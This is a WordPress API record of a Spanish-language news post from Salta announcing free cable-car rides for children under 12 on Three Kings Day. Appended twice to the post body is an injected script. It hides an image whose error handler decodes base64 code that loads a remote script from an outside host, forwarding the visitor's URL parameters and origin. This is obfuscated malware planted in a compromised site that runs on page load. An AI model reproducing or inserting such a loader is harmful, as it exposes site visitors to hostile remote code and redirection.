{"id":4729,"date":"2025-01-06T09:44:27","date_gmt":"2025-01-06T12:44:27","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4729"},"modified":"2025-08-13T23:42:51","modified_gmt":"2025-08-14T02:42:51","slug":"el-teleferico-san-bernardo-sera-gratuito-para-los-menores-por-el-dia-de-reyes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4729","title":{"rendered":"El Telef\u00e9rico San Bernardo ser\u00e1 gratuito para los menores por el D\u00eda de Reyes"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-87bc0b19d9c8acaa88a08bcf4cf17e62\" style=\"background-color:#750823\"><strong><em>En el marco por la celebraci\u00f3n del D\u00eda de Reyes Magos, el Telef\u00e9rico San Bernardo ofrece la gratuidad para los menores hoy 6 de enero.<\/em><\/strong><\/h3>\n\n\n\n<p>El&nbsp;<strong>Telef\u00e9rico San Bernardo<\/strong>, una vez m\u00e1s, siendo un cl\u00e1sico para esta \u00e9poca del a\u00f1o,ofrece un viaje (ida y vuelta) gratuito para los menores de 12 a\u00f1os de edad por el D\u00eda de Reyes Magos, que se celebra este&nbsp;lunes 6 de enero.<\/p>\n\n\n\n<p>El ascenso se realizar\u00e1&nbsp;desde las 9 hs. Se&nbsp;recuerda que por cada cuatro ni\u00f1os debe viajar un adulto responsable.<\/p>\n\n\n\n<p>Melchor, Gaspar y Baltazar los esperar\u00e1n en la cima del cerro San Bernardo de 15 a 18 hs para pasar un m\u00e1gico momento junto a los ni\u00f1os y ni\u00f1as.<\/p>\n\n\n\n<p>El Telef\u00e9rico San Bernardo es uno de los principales atractivos tur\u00edsticos de nuestra provincia y espera con ansias la visita de salte\u00f1os y turistas en esta nueva temporada de vacaciones de verano.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco por la celebraci\u00f3n del D\u00eda de Reyes Magos, el Telef\u00e9rico San Bernardo ofrece la gratuidad para los menores hoy 6 de enero. El&nbsp;Telef\u00e9rico San Bernardo, una vez m\u00e1s, siendo un cl\u00e1sico para esta \u00e9poca del a\u00f1o,ofrece un viaje (ida y vuelta) gratuito para los menores de 12 a\u00f1os de edad por el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4730,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-4729","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4729"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4729"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4729\/revisions"}],"predecessor-version":[{"id":6601,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4729\/revisions\/6601"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4730"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}